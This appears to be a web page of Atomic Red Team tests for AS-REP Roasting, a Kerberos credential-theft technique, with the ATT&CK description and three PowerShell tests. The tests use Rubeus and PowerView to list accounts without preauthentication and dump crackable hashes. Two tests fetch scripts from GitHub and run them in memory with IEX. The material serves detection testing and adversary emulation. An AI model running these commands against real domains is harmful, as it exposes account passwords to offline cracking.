Try it using Invoke-Atomic

Steal or Forge Kerberos Tickets: AS-REP Roasting

Description from ATT&CK

Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by Password Cracking Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017)

Preauthentication offers protection against offline Password Cracking. When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)

For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline Password Cracking attacks similarly to Kerberoasting and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)

An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like PowerShell with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)

Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.(Citation: SANS Attacking Kerberos Nov 2014) https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - Rubeus asreproast

Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus

Supported Platforms: windows

auto_generated_guid: 615bd568-2859-41b5-9aed-61f6a88e48dd

Inputs:

Name Description Type Default Value
local_folder Local path of Rubeus executable Path $Env:temp
local_executable name of the rubeus executable String rubeus.exe
out_file file where command results are stored String rubeus_output.txt
rubeus_url URL of Rubeus executable Url https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe

Attack Commands: Run with powershell!

1
2
cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}"

Cleanup Commands:

1
2
Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Computer must be domain joined

Check Prereq Commands:

1
2
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
Write-Host Joining this computer to a domain must be done manually

Description: Rubeus must exist

Check Prereq Commands:

1
2
if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}

Atomic Test #2 - Get-DomainUser with PowerView

Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.

Supported Platforms: windows

auto_generated_guid: d6139549-7b72-4e48-9ea1-324fc9bdf88a

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose

Atomic Test #3 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus

PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn

Supported Platforms: windows

auto_generated_guid: 8c385f88-4d47-4c9a-814d-93d9deec8c71

Inputs:

None

Attack Commands: Run with powershell!

1
2
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
Invoke-Rubeus -Command "asreproast /format:hashcat /nowrap"

source